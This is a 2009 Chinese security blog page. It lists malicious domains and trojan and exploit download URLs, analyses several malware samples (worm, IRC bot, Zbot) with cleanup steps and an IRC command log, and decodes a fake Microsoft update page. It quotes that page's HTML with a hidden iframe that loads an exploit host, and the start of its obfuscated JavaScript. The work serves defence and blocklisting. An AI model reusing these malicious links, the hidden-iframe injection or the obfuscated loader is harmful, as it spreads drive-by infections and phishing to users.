Windows LiveWindows Live
 
 
Xiang's profileBlast祥的共享空间Blog Tools Help

Blast祥的共享空间

Blast's security lab. (转载请保留出处:Safelab.Spaces.Live.Com) [(由于学业问题,每周更新一次) Mail:597432784@qq.com]

Profile

Xiang Blast

Occupation
学生
Location
PRC
View profile details

Custom HTML

置顶信息(点击查看)


2009.06 6月14日-2009.6.14 Parite修复算法

2009.06 6月14日-多个gov.cn网站被入侵

2009.06 6月8日-利用率可能提升:PDF Collab漏洞(中到高)

2009.05 5月2日-暴风09的mps.dll参数检查不严格漏洞(高)

共享样本索引(点击查看)

漏洞预警汇总日志(点击查看)

常见问题
Q: 毒网预警标题日期不正确?
A: 既然是警那就得把日期往后推一两天嘛^_^

Q: 为什么以前文章提到的一些网站打不开了?
A: 失效了,打一枪,换一地

待补充


END

(转载的朋友,手下留情,注明出处:Http://Safelab.Spaces.Live.com。)

Blog
July 03

2009.7.4 毒网预警(更新25+1个恶意域名)

恶意网站信息来源: dearhaoji[T 3-4] 魔狼军团的博客[T 22-25]
恶意网站分析由: http://safelab.spaces.live.com

解密日期:2009-7-3
木马相关(Trojan/Malware Related)
网站
解密信息
1, aveylpa.cn
2, mywhitecoat.com
3, mvt.c0m.at
4, czxcdz.com
[木马]
>http://aveylpa.cn/?wm=70141
>[Tr.Fakealert]http://aveylpa.cn/installer_70141.exe
>[Tr.TDSS]http://www.mywhitecoat.com/ecard.exe
>[Tr.Downloader]http://mvt.c0m.at/aa.css
>http://www.czxcdz.com/m/1.css
5, 174.133.73.90
6, 174.133.72.250
7, 1.google-credit.cn
8, 92.51.137.94
[木马]

>[Tr.Refpon]http://174.133.73.90/p0324/2.0/w.bin
>http://174.133.73.90/p0508/2.0/d.bin
>http://174.133.73.90/p0508/2.0/ms.bin
>http://174.133.73.90/p0508/2.0/w1.bin
>http://174.133.73.90/p0324/2.0/af.bin
>http://174.133.73.90/p0324/2.0/ma.bin
>http://174.133.73.90/p0324/2.0/so.bin
>http://174.133.72.250/p1212/2.0/td.bin
>http://174.133.72.250/p0324/2.0/rtl60.bin
>[Tr.Zbot]http://1.google-credit.cn/q83wi/cf46.bin
>http://1.google-credit.cn/q83wi/ld46.exe
>http://92.51.137.94/objects/npfv501.dll

9, download.live-player.com
10, denirulz.org
11, cutaiamortgagegroup.cn
[木马]
12, free-ipodtouch.com
13, hi5-imgs.com
14, hi5-gallerys.com
15, heyjoy.cn
16, imagecake.cn
17, makotoro.com
18, msnpicspace.com
19, photos-google.com
20, x.b76.net
21, pilt24.pri.ee
[木马]
>[Tr.Backdoor]http://free-ipodtouch.com/technigo.exe
>[Tr.IRCBot]http://hi5-imgs.com/img029-www.hi5.com.exe
>http://hi5-gallerys.com/loader.exe
>http://hi5-imgs.com/id.php?=3375@live.cn
>http://heyjoy.cn/612.exe
>http://imagecake.cn/gallery.php?=dsc_nude452.jpg
>http://makotoro.com/djwl/djwl.bin
>http://msnpicspace.com/viewimage.php?=3375@live.cn
>http://photos-google.com/image0192-29.exe?=3375@live.cn
>http://x.b76.net/winres.exe
>http://www.pilt24.pri.ee/images/comprofiler/gallery/viewimage.php?=3375@live.cn
22, officeon.viens.la
23, ckt1.cn
24, wvg7.cn
25, wvg6.cn
[木马]
>http://officeon.viens.la/office.js?google_ad_format=728x90_as
>http://ckt1.cn
>http://ckt1.cn/url.asp
>http://wvg7.cn
>http://wvg6.cn

解密日期:2009-7-3
钓鱼/虚假广告相关(Phishing/FakeAdwareRelated)
网站
钓鱼情况
1, maincomunity.awardspace.biz
[钓鱼]
>http://maincomunity.awardspace.biz/

声明:
危险性:文中列于木马相关中的均为恶意木马站点,请勿直接点击(显示可执行文件的链接仅为病毒收集人员下载提供方便)。列于钓鱼相关中的网站为钓鱼站或是虚假的广告站点以及一些可能不符合法律规定的内容,一般情况下请不要相信这些网站的内容,也不要访问这些网站。
利用方式:所有链接仅供爱好者或安全研究人员做屏蔽、入库或上报安全软件厂商用,禁止一切非法的用途(包括复制,修改,无备注公布等一切传播行为)。
免责:您可以从此处提取站点进行屏蔽,但是我并不保证此处出现的一定为恶意站点,且不为可能出现的错误预警负任何责任,屏蔽一切站点前请复查。您可以从此处下载您需要的样本,但是本人不对因误执行样本等行为导致的任何直接损失或间接损失负责。
时效性:由于木马页面或钓鱼页面失效速度快,故可能部分网站经过一段时间会出现无法访问的情况。
10:36 PM | Add a comment | Permalink | Blog it | 毒网预警

2009.7.3 xdbot.exe

名称: xdbot.exe (样本)
语言: Microsoft Visual C++ 6.0
类型: WR/P2PWorm;
MD5: 39B98D4C82D7B3D3E76779C17FD233C6
加壳: -
大小: 88.0 KB (90,194 字节)
时间: 2009年7月3日, 22:04:05
SAL#09093
safelab.spaces.live.com

分析:启动后,程序使用gethostbyname获取microsoft.com的IP,保证网络是连接的,然后程序加载kernel32.dll,读取一些函数地址,然后Sleep休眠500毫秒,接着调用RegOpenKeyA打开hkcu\console,并请求fontsize,fullscreen的值,接着,程序调用GetModuleFileNameA获取自身路径,然后CreateFileA打开自身,GetFileSize获取文件大小,realloc对分配返回的数据,Readfile读取自身数据,并CreateProcessA启动自身,修改进程,然后恢复进程。恢复的进程会复制自身到%system%\ctfm0n.exe(如果不存在的话),存在则复制到任意6位字母.exe,建立启动项“Winsock update2”,指向ctfm0n.exe,并建立文件夹%system%\kazaabackupfiles,复制自身到download_me.exe。使得自己可以在Kazza网络中传播。之后程序退出。

清理:
1, 删除对应文件,启动项
2, 重新启动

10:17 PM | Add a comment | Permalink | Blog it | 病毒分析

2009.7.3 IMG029-www.hi5.com.exe

名称: IMG029-www.hi5.com.exe (样本)
语言: [Microsoft CAB SFX]  -> Borland Delphi 6.0 - 7.0 -> Microsoft Visual C++ 7.0
类型: TR/IRCBot;
MD5: 031429FC14151F94C8651A3FB110C19B
加壳: -
大小: 99.0 KB (101,376 字节)
时间: 2009年7月2日, 22:58:12
SAL#09092
safelab.spaces.live.com

加壳/保护:
程序第一层为Microsoft CAB自解压包,解压完毕后可见一个NEWPAC~1.EXE,这是一个IRCBot,不过不是最终的文件。Newpac~1.exe执行后,会试图加载必需DLL,并解压自身数据,使用CreateProcessA启动自身,并修改内存数据,写入解压后的数据,然后使用ResumeThread恢复线程。

动作:
可以使用OllyDebug的Attach功能附加到进程上,NEWPAC~1.EXE恢复线程后,弹出对话框“Windows Microsoft Viewer:Picture can not be displayed.”,点击确认后,执行正式代码,程序使用FindWindow查找指定窗体,并使用SendMessage发送消息,比如AIM_IMessage,WndAte32Class等,程序还会创建线程“MSN Threads”,“AIM Threads”,“TIM Threads”,分别用于向Messenger 、AIM、Triton发送消息,然后程序获取临时目录位置,并试图获取更新,更新完成之后会试图使用"!!!Security!!!. Lamer detected. coming back next reboot, cya."的信息欺骗用户重启,然后程序会复制自身到winudp.exe,设置属性为只读、隐藏系统并试图启动,并修改内存执行,文件会新建启动项“Windows UDP”,指向“winudp.exe”,使得自己开机时被执行,文件也会后台访问IRC服务器ad.chfo991.com,密码:letmein,获取病毒更新信息。记录如下:

:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
:irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:irc.foonet.com 001 [00|CHN|344911] :Welcome to the ROXnet IRC Network [00|CHN|344911]!XP-3970@60.167.209.23
:irc.foonet.com 002 [00|CHN|344911] :Your host is irc.foonet.com, running version Unreal3.2.8.1
:irc.foonet.com 003 [00|CHN|344911] :This server was created 2009... 06... 24... CST at ......... 17:34:11
:irc.foonet.com 004 [00|CHN|344911] irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:irc.foonet.com 005 [00|CHN|344911] CMDS=KNOCK,MAP,DCCALLOW,USERIP UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 :are supported by this server
:irc.foonet.com 005 [00|CHN|344911] MAXTARGETS=20 WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT :are supported by this server
:irc.foonet.com 005 [00|CHN|344911] STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server
:irc.foonet.com 251 [00|CHN|344911] :There are 2296 users and 2618 invisible on 1 servers
:irc.foonet.com 253 [00|CHN|344911] 3 :unknown connection(s)
:irc.foonet.com 254 [00|CHN|344911] 8 :channels formed
:irc.foonet.com 255 [00|CHN|344911] :I have 4914 clients and 0 servers
:irc.foonet.com 265 [00|CHN|344911] :Current Local Users: 4914  Max: 7411
:irc.foonet.com 266 [00|CHN|344911] :Current Global Users: 4914  Max: 7411
:irc.foonet.com 422 [00|CHN|344911] :MOTD File is missing
:[00|CHN|344911] MODE [00|CHN|344911] :+iwx
:[00|CHN|344911] MODE [00|CHN|344911] :-ix
:[00|CHN|344911]!XP-3970@60.167.209.23 JOIN :#maya
:irc.foonet.com 332 [00|CHN|344911] #maya :.msn.msg did haha :P http://photos-google.com/Image0192-29.exe?=
:irc.foonet.com 333 [00|CHN|344911] #maya uu 1246525296
:irc.foonet.com 353 [00|CHN|344911] @ #maya :[00|CHN|344911]
:irc.foonet.com 366 [00|CHN|344911] #maya :End of /NAMES list.
:irc.foonet.com 404 [00|CHN|344911] #maya :You must have a registered nick (+r) to talk on this channel (#maya)

清理:
1, 结束进程winudp.exe
2, 删除对应文件,启动项
3, 重新启动

9:41 PM | Add a comment | Permalink | Blog it | 病毒分析
July 01

2009.7.2 毒网预警(更新10+3个恶意域名)

恶意网站信息来源:
恶意网站分析由: http://safelab.spaces.live.com

解密日期:2009-7-1
木马相关(Trojan/Malware Related)
网站
解密信息
1, update.microsoft.com.hilli.com.mx
2, ogzhnsltk.com
3, rapidsystemsend.ru
4, yllowpagesnotstop.ru
[木马/欺骗]

>http://update.microsoft.com.hilli.com.mx/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=602495845850847579672418430980791
>http://update.microsoft.com.hilli.com.mx/microsoftofficeupdate/isapdl/default.aspx/?ln=en-us&id=602495845850847579672418430980791
>http://ogzhnsltk.com/plugins/index.php
>[Exploit.PDF]http://ogzhnsltk.com/plugins/pdf.php
>[TR.Zbot]http://ogzhnsltk.com/plugins/getexe.php
>http://ogzhnsltk.com/plugins/safelab.spaces.live.com
>http://rapidsystemsend.ru/transsend.html?5f88678945fe
>http://rapidsystemsend.ru/berikosmon.html
>http://yllowpagesnotstop.ru/pig/index.php
>[Exploit.SWF]http://yllowpagesnotstop.ru/pig/deOr.swf
>[Exploit.PDF]http://yllowpagesnotstop.ru/pig/tookNormalFact.pdf
>[TR.Zbot]http://yllowpagesnotstop.ru/pig/update.php

5, artmarket.or.kr
6, flywell-travel.com
7, sxicl.co.uk
[被入侵/寄宿木马]
8, 30ju.notlong.com
9, xvideox.awardspace.biz
10, securerealy.com
[木马]
>http://30ju.notlong.com/
>http://xvideox.awardspace.biz/hDfikU6kldoUeD.html
>[TR.FakeCodec]http://securerealy.com/download/4d4e734d59773d3d5b37a63a20090701/TestCodec.exe

解密日期:2009-7-1
钓鱼/虚假广告相关(Phishing/FakeAdwareRelated)
网站
钓鱼情况
1, chaseonline.chase.com.iljihli.com.mx
[钓鱼: ChaseOnline chaseonline.chase.com]
>http://chaseonline.chase.com.iljihli.com.mx/Secure/webform/OSL.aspx/?LOB?1477694816119896109073815863%2063656867568548381323018755838383
2, yes.skopnews.ru
3, budblije.ru
[色情]
>http://yes.skopnews.ru/go.php?sid=5
>http://budblije.ru/?rid=395

声明:
危险性:文中列于木马相关中的均为恶意木马站点,请勿直接点击(显示可执行文件的链接仅为病毒收集人员下载提供方便)。列于钓鱼相关中的网站为钓鱼站或是虚假的广告站点以及一些可能不符合法律规定的内容,一般情况下请不要相信这些网站的内容,也不要访问这些网站。
利用方式:所有链接仅供爱好者或安全研究人员做屏蔽、入库或上报安全软件厂商用,禁止一切非法的用途(包括复制,修改,无备注公布等一切传播行为)。
免责:您可以从此处提取站点进行屏蔽,但是我并不保证此处出现的一定为恶意站点,且不为可能出现的错误预警负任何责任,屏蔽一切站点前请复查。您可以从此处下载您需要的样本,但是本人不对因误执行样本等行为导致的任何直接损失或间接损失负责。
时效性:由于木马页面或钓鱼页面失效速度快,故可能部分网站经过一段时间会出现无法访问的情况。
10:36 PM | Add a comment | Read comments (1) | Permalink | Blog it | 毒网预警

时隔10天,TDSS再次借助SPAM传播

TDSS再次以ecard的邮件欺骗用户传播,除了感叹骗术之低之外,也请不要点击包含的exe连接!相关恶意URL将在今日的毒网预警中公布。
8:35 PM | Add a comment | Permalink | Blog it | 安全简讯

SPAM团队使用MJ相关主题欺骗用户点击


如果看到这封邮件,请勿点击连接,虽然目前重定向失败,但是以后很可能会出现重定向到挂马站点的情况!
8:32 PM | Add a comment | Permalink | Blog it | 安全简讯
June 30

2009.7.1 毒网预警(更新13个恶意域名)

恶意网站信息来源: 魔狼军团的博客[T 1-13]
恶意网站分析由: http://safelab.spaces.live.com

解密日期:2009-
木马相关(Trojan/Malware Related)
网站
解密信息
1, wvg0.cn
2, wvg3.cn
3, wvg4.cn
4, wvg6.cn
[重定向]
关于:hxxp://meteor.1010zz.cn/解密的日志(部分输出 -  4):
Level  1>http://wvg0.cn
Level  1>http://wvg3.cn
Level  1>http://wvg4.cn
Level  1>http://wvg6.cn
日志由 Redoce1.9第72次修正版于 2009-6-30 20:42:56 生成。
5, 3b3.org
6, vpsvip.com
7, milllk.com
8, mmdeai.3322.org
[木马]
关于:hxxp://www.nmsbd.com/解密的日志(全体输出 -  18):
Level  1>http://3b3.org/c.js
Level  2>http://vpsvip.com/aa/a100.htm
Level  3>http://vpsvip.com/aa/index.htm
Level  4>http://vpsvip.com/aa/js.js
Level  5>http://vpsvip.com/aa/vcr.htm
Level  6>http://vpsvip.com/aa/real1.js
Level  6>http://vpsvip.com/aa/real.js
Level  6>http://vpsvip.com/aa/turl.js
Level  7>[TR.Downloader]http://milllk.com/wm/svchost.exe
Level  5>http://vpsvip.com/aa/vclb.htm
Level  5>http://vpsvip.com/aa/vcxxz.htm
Level  5>http://vpsvip.com/aa/vcvod.htm
Level  5>http://vpsvip.com/aa/z.htm
Level  5>http://vpsvip.com/aa/vcff.htm
Level  5>http://vpsvip.com/aa/vcfl.htm
Level  5>http://vpsvip.com/aa/vc14.htm
Level  4>http://vpsvip.com/aa/axin.htm
Level  5>[TR.Downloader]http://mmdeai.3322.org/atievx.exe#version=1,0,0,002
日志由 Redoce1.9第72次修正版于 2009-6-30 20:44:13 生成。
9, 222.231.60.19
10, ei8i.cn
11, elfah.net
12, qiqijis.com
[木马]
关于:hxxp://www.cites.gov.cn/解密的日志(部分输出 -  22):
Level  1>http://222.231.60.19/seraph/door/iishelp/help.js
Level  2>http://www.ei8i.cn/index.htm
Level  2>http://elfah.net/jacon/css/a.htm
Level  3>http://elfah.net/jacon/css/benner.htm
Level  4>http://elfah.net/jacon/css/xxcutea.htm
Level  5>[TR.Downloader]http://www.qiqijs.com/gm/gm.exe#version=1,0,0,002
Level  4>http://elfah.net/jacon/css/sfpf.js
Level  5>http://elfah.net/jacon/css/sfpf.htm
Level  6>http://elfah.net/jacon/css/sf.pdf
Level  7>http://www.qiqijs.com/gm/gm.exe
Level  4>http://elfah.net/jacon/css/images.js
Level  5>http://elfah.net/jacon/css/fyr.htm
Level  5>http://elfah.net/jacon/css/ecb.htm
Level  5>http://elfah.net/jacon/css/ec0.htm
Level  5>http://elfah.net/jacon/css/fycry.htm
Level  5>http://elfah.net/jacon/css/fydvd.htm
Level  5>http://elfah.net/jacon/css/fyff.htm
Level  5>http://elfah.net/jacon/css/fyfl.htm
Level  5>http://elfah.net/jacon/css/ec1.htm
Level  6>http://elfah.net/jacon/css/ec4.js
Level  7>http://www.qiqijs.com/gm/gm.exe
Level  2>http://elfah.net/jacon/css/fyfl.htm
日志由 Redoce1.9第72次修正版于 2009-6-30 20:47:32 生成。
13, feitengdog.com
[被入侵/寄宿网马/寄宿木马]
关于:hxxp://www.tjjt.tongji.edu.cn/解密的日志(部分输出 -  9):
Level  1>http://www.feitengdog.com/dvbbs/ie7.htm
Level  2>[TR.Backdoor]http://www.feitengdog.com/dvbbs/server.exe
Level  1>http://www.feitengdog.com/dvbbs/temp/no.htm
Level  1>http://www.feitengdog.com/dvbbs/temp/gvxxz.htm
Level  1>http://www.feitengdog.com/dvbbs/temp/gvgg.htm
Level  1>http://www.feitengdog.com/dvbbs/temp/gvff.htm
Level  1>http://www.feitengdog.com/dvbbs/temp/gvcx.htm
Level  1>http://www.feitengdog.com/dvbbs/temp/gvbf.htm
Level  1>http://www.feitengdog.com/temp/gv122121.htm
日志由 Redoce1.9第72次修正版于 2009-6-30 20:51:40 生成。

解密日期:2009-
钓鱼/虚假广告相关(Phishing/FakeAdwareRelated)
网站
钓鱼情况

声明:
危险性:文中列于木马相关中的均为恶意木马站点,请勿直接点击(显示可执行文件的链接仅为病毒收集人员下载提供方便)。列于钓鱼相关中的网站为钓鱼站或是虚假的广告站点以及一些可能不符合法律规定的内容,一般情况下请不要相信这些网站的内容,也不要访问这些网站。
利用方式:所有链接仅供爱好者或安全研究人员做屏蔽、入库或上报安全软件厂商用,禁止一切非法的用途(包括复制,修改,无备注公布等一切传播行为)。
免责:您可以从此处提取站点进行屏蔽,但是我并不保证此处出现的一定为恶意站点,且不为可能出现的错误预警负任何责任,屏蔽一切站点前请复查。您可以从此处下载您需要的样本,但是本人不对因误执行样本等行为导致的任何直接损失或间接损失负责。
时效性:由于木马页面或钓鱼页面失效速度快,故可能部分网站经过一段时间会出现无法访问的情况。
9:14 PM | Add a comment | Permalink | Blog it | 毒网预警

2009.6.30 load.exe

名称: load.exe (样本)
语言: Borland Delphi 6.0 - 7.0
类型: TR/Zbot;
MD5: 0862871440E8C9CDA1D02BD8C9AB5867
加壳: 未知壳
大小: 81.0 KB (82,944 字节)
时间: 2009年6月29日, 22:15:04
SAL#09091
safelab.spaces.live.com

脱壳:使用bp LoadLibraryA再回到程序领空,加载完dll即可。但是OEP处并无明显界线。
程序使用LoadLibraryA加载的库:
0040A8FC    B9 343D4000     mov     ecx, 00403D34                    ; ASCII "kernel32.dll"
0040A91E    E8 BD090000     call    0040B2E0
..
0040A919    B9 443D4000     mov     ecx, 00403D44                    ; ASCII "shell32.dll"
0040A938    E8 A3090000     call    0040B2E0
..
0040A933    B9 FC1D4000     mov     ecx, 00401DFC                    ; ASCII "ntdll.dll"
...

动作:程序使用CreateMutexW创建互斥体_AVIRA_21099,并获取第一个进程名,但没有操作,随后程序使用OpenMutexW打开_AVIRA_2109互斥体,并使用GetModuleFileNameW获取自身路径,调用SHGetSpecialFolderW获取系统目录地址,并随后使用PathCombineW连接形成%system%\sdra64.exe。连接完后,程序会调用lstrcmpiW比较是否和自身路径一致,如果不同,则程序调用RegCreateKeyExW创建键HKLM\software\microsoft\windows nt\currentversion\winlogon,并RegQueryValueExW获取userinit的值,连上,%system%\sdra64.exe写回,使得自身在系统启动时可以被加载。之后程序调用SetFileAttributesW设置sdra64.exe的属性为存档(A),并调用DeleteFileW删除文件(之前的互斥体保证sdra64.exe没有被执行过),然后使用CopyFileW复制自身到%system%\sdra64.exe,并再次SetFileAttributesW设置为隐藏、系统、存档(HSA),然后打开文件写入附加数据。

写入完成时,程序使用SHGetSpecialFolderW获取系统目录,PathCombineW连接获得%system%\ntdll.dll,使用CreateFileW打开文件,GetFileTime获取其文件修改时间,并SetFileTime修改sdra64.exe的修改时间和ntdll.dll一致,使得用户无法轻易的通过资源管理器的时间升序/降序查看到他,完成后程序调用SetFileAttributesW设置其属性为只读、存档(RA),并调用Process32FirstW,获取进程lstrcmpiW比对是否为winlogon.exe,如果不是则Process32NextW继续,直到发现,发现后,程序将试图使用OpenProcess等对进程进行操作,完毕后,程序不断Sleep 20ms进入循环。

清理:
1, 结束sdra64.exe,从winlogon.exe进程空间中移除sdra64.exe(如果有)
2, 删除对应文件
3, 还原userinit值到“c:\windows\system32\userinit.exe,”
4, 重新启动
9:09 PM | Add a comment | Permalink | Blog it | 病毒分析
June 29

2009.6.29 网马解密

网址:update.microsoft.com.kiffil.com.mx/microsoftofficeupdate/isapdl/default.aspx/?ln=en-us&id=069725887396190003032080657151226705177238757170 (失效快,不用试了,我贴代码就是……)
日期:2009.6.29 22.58.18
难点:以正常人的智商面对一段脑残的代码
代码:不正常
语言:JavaScript
编号:SAL#09D05
By. Safelab.spaces.live.com / BlastXiang.

*前言:为什么写这篇文章,因为有人对我这个“解密相关”分类的存在性提出质疑,整个破分类就4篇文章还害我天天订阅来订阅去的,但是其实我只是想说……没有代表性的我不想打字了……然而这又招致一顿懒人的臭骂,那算了我写篇吧……按照第一篇的优秀传统写……
?网址来源:如图

首先是一封极其藐视人类智商的邮件,URL一看就很假(还是上次说的嘛<a href=TrueURL>Description</a>),我D版我自豪,我就不信微软这么照顾我这D版用户。
其次是一个极其藐视用户智商的页面,不仅卡(ie的话),而且连正版验证都不要!……呃,当然,这是D版用户的惊喜而已

Level 1网页代码:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<META HTTP-EQUIV='Refresh' CONTENT='7; url=index2.php'>
<title>Update for Microsoft Outlook / Outlook Express (KB910721)</title>
<style type="text/css">
<!--
.style2 {font-size: xx-small}
-->
</style>
</head><body style="font-family:Verdana,Arial,Helvetica,sans-serif;margin:0;">
<basefont face="Verdana, Arial, Helvetica">
<div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td width="100%" height="22"><table border="0" cellpadding="0" cellspacing="0" height="22" width="100%"><tbody><tr>
<td style="padding-left:7px;" bgcolor="#4b92d9" nowrap="nowrap"><span style="color: #FFFFFF;font-size: 70%;">Critical Update</span></td>
</tr></tbody></table></td>
</tr></tbody></table>
</div>
<iframe src='http://ogzhnsltk.com/plugins/index.php' width='1' height='1' style='visibility:hidden;'></iframe>
<table dir="LTR" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr valign="top">
<td width="100%" height="100%" dir="LTR">
<div style="margin:20px 20px 50px 20px;">
<div>
<h1 style="font-size:1.3em;font-weight:normal;">Update for Microsoft Outlook / Outlook Express (KB910721)</h1>
<div align="center"><br><img src="ajax-loader.gif" width="192" height="22"><br>
  <br><font color="#89B8E7" size="4"><strong>Please wait...</strong></font><br>
    <br>
</div>
<h5 style="font-size:.8em;margin-bottom:5px;">Brief Description</h5>
<div style="font-size:.7em;padding:0;">Microsoft has released an update for Microsoft Outlook / Outlook Express. This update is critical and provides you with the latest version of the Microsoft Outlook / Outlook Express and offers the highest levels of stability and security.</div>
<div align="center">
</div>
<div>
<h4 style="font-size:.8em;margin-bottom:.3em;">Quick Details</h4>
</div>
</div>
<div style="font-size:.7em;margin:0 0 10px 20px;">
<ul style="margin-bottom:.3em;margin-top:.3em;">
<li style="padding-bottom:3px;padding-top:3px;">File Name: officexp-KB910721-FullFile-ENU.exe</li>
<li style="padding-bottom:3px;padding-top:3px;">Version: 1.4</li>
<li style="padding-bottom:3px;padding-top:3px;">Language: English</li>
<li style="padding-bottom:3px;padding-top:3px;">File Size: 81 KB</li>
</ul>
</div>
<h4 style="font-size:.8em;margin-bottom:.3em;">System Requirements</h4>
<div style="font-size:.7em;margin:0 0 10px 20px;"><span>
<ul style="margin-bottom:.3em;margin-top:.3em;">
<li style="padding-bottom:3px;padding-top:3px;"><b>Supported Operating Systems: </b>Windows 2000; Windows 98; Windows ME; Windows NT; Windows Server 2003; Windows XP; Windows Vista </li>
</ul>
<ul style="margin-bottom:.3em;margin-top:.3em;">
<li style="padding-bottom:3px;padding-top:3px;"><b>This update applies to the following product: </b> Microsoft Outlook / Outlook Express</li>
</ul>
</span></div></td>
</tr>
</tbody></table>
<table style="font:70% Tahoma, Helvetica;border-top:solid 1px #003499;" cellpadding="0" cellspacing="0" width="100%"><tbody><tr valign="bottom"><td style="font-family:Verdana,Arial,Helvetica,sans-serif;"><div style="margin:0px;padding-top:8px;padding-left:10px;"><wbr><nobr style="color:#A9A9A9;margin-right:5px;"><a href="http://go.microsoft.com/?linkid=2028325" target="_blank">Contact Us</a></nobr></div>
<div style="margin:0px;padding-top:10px;padding-bottom:13px;padding-left:10px;"><span dir="ltr">?2009 Microsoft Corporation. All rights reserved.&nbsp;</span><nobr style="color:#A9A9A9;margin-right:5px;"><a style="color:#03C;margin-right:2px;background:transparent;font-weight:normal;" href="http://support.microsoft.com/contactus/?ws=mscom" target="_blank">Contact Us</a> |</nobr><wbr><nobr style="color:#A9A9A9;margin-right:5px;"><a style="color:#03C;margin-right:2px;background:transparent;font-weight:normal;" href="http://go.microsoft.com/?linkid=4412892" target="_blank">Terms of Use</a> |</nobr><wbr><nobr style="color:#A9A9A9;margin-right:5px;"><a style="color:#03C;margin-right:2px;background:transparent;font-weight:normal;" href="http://go.microsoft.com/?linkid=4412893" target="_blank">Trademarks</a> |</nobr><wbr><nobr style="color:#A9A9A9;margin-right:5px;"><a href="http://go.microsoft.com/?linkid=4412894" target="_blank">Privacy Statement</a></nobr></div></td></tr></tbody></table>
</body></html>

代码如上,看到什么了?如果你要回答看到一大堆英文字母我就没办法了,红色标记的地方,是一个隐藏的网页框架元素,长1宽1还不可见,传说中的一页障目,其实代码如果真high起来卡不死你,不过卡也是微软的特性之一了,兴许还真有人死心塌地的等他安装完也说不定,我们看框架的代码:

Level 2框架代码:
<html><head></head><body><div style="display: none;"><AfV4zNakvq id='CYp4qZlixQw'>or.mimeTypes.leng</AfV4zNakvq><TdJT464SHCeI2C id='k2dHMiABen0r0i'>0%20%20</TdJT464SHCeI2C><LnbRMzlzMISwReXV id='IF6Z99'>2F%3E%3C%2</LnbRMzlzMISwReXV><M289S5C9Z id='J8EmYvpE1mBYcFO'>th%29%0A%20%20%</M289S5C9Z><DSp2l6CEHkT9jI id='x7P1pXFQO'>ry%0A%20%20%20%</DSp2l6CEHkT9jI><H0mDp30R id='bHA5pAEM8vOL6y0'>b7UBXTkBUxRh</H0mDp30R><ArAw5p id='flmrMb'>0%20%20%20%</ArAw5p><dvAoyP id='wuheVrk8Hicc02'>%20%7D%0A</dvAoyP><dj8BY421k id='famMRDCqpFdpyS'>%20%20%20%20if</dj8BY421k><rhTw9u id='mi7Lo4KsXUckWzIv'>be%20</rhTw9u><GfcFZK3m1EsvD46 id='PhwzXKBGh'>8%20var%20bzghM</GfcFZK3m1EsvD46><mspQKsGIzujZh7 id='TJDUOi6r'>0%20%2</mspQKsGIzujZh7><kHKEJl0oKuyq9Ub id='xTDBXSCPWU84'>e%3B%</kHKEJl0oKuyq9Ub><URPaWygaTt4bfSGY id='XDpBci2uNvU8'>licati</URPaWygaTt4bfSGY><qyvWUHUYaGa id='BBBONshxYxdk0kO'>%20%20%20%20%7B%0A%</qyvWUHUYaGa><xPTUmhnrBa id='f0vPy5iH6n8EaKB'>me%3B%0A%20%</xPTUmhnrBa><o0OlQqBn7CS id='PikMMg07EdZClDB'>0%20%20%7B</o0OlQqBn7CS><ZBAtPsspjQ id='zhnCgC7u'>%20%20%20%20%20for%2</ZBAtPsspjQ><lrKtHvP id='LqnV0hNo'>20%3D%20navigator.</lrKtHvP><S5z7D9HXxmFk id='LxKix9TwcezfD'>%29%0A%20</S5z7D9HXxmFk><EUx3jAY4DSF id='MKCf5gjoeel0'>0%20%2</EUx3jAY4DSF><ZA6bPy id='egUIMI3M'>7D%0A%20%20%20%2</ZA6bPy><rXADOOg3k2 id='UVUaxlnb5poRTHq9'>e%29%0A%20%20%2</rXADOOg3k2><znlvlllLk4dyCU id='PtNVgbGvdlmNus4y'>20%20i</znlvlllLk4dyCU><B5VOQd id='LsRi8nV'>e5rRA4U%20%3</B5VOQd><SCPFs2VSLXE id='xSx1HgRmONlvh'>5e5rRA4U%20%3D%200%3</SCPFs2VSLXE><yqVmqHyOuEn6FuDi id='c8xqssgszuf'>20%20%20%20%</yqVmqHyOuEn6FuDi><qyLjYG6snBLhn2 id='vH9j2EstvS'>0%20%20%20%20%20%</qyLjYG6snBLhn2><zDLbHLiVT id='TgyzXSIVm1SvTOX9'>%20%20%7B%0A%</zDLbHLiVT><I6nW3mRT id='iN0BVO'>ghM5e5rRA4U%</I6nW3mRT><QTbjkqhSnkajdFvw id='YMlF8FOqX'>B%0A%</QTbjkqhSnkajdFvw><d0ruuCZ2Y68LOWTu id='EOW87bPS'>22%2C%20500%29%3B%0A</d0ruuCZ2Y68LOWTu><lCdzWZqrArUkI id='R2q1QmI'>Zxinm6C4MZwtl%28%2</lCdzWZqrArUkI><jBmpZH1gXPuX7yYB id='xdUlVm6AkDhu'>0if%28%20McRQOv2</jBmpZH1gXPuX7yYB><Wh5svW81IureVUWg id='qkYpPDbZS7XV'>20%20var%20McRQOv2</Wh5svW81IureVUWg><spIVOZShyn id='tmbwEBqdhGpo'>%20%20%20%20else%2</spIVOZShyn><QwVnaBmN2Zl id='xSILNLOO'>27%29%3B%0A</QwVnaBmN2Zl><BFFkR6agiQeB id='beBbHxClsn'>%28Mb7UBXTk</BFFkR6agiQeB><zwsfBI59ltAW id='Gd5GGFxiw4'>20%20%7</zwsfBI59ltAW><l9cETnpsHKey9W0 id='hiAucHhlD8jIp2N'>20%20%20</l9cETnpsHKey9W0><REKzdPR3K3wq 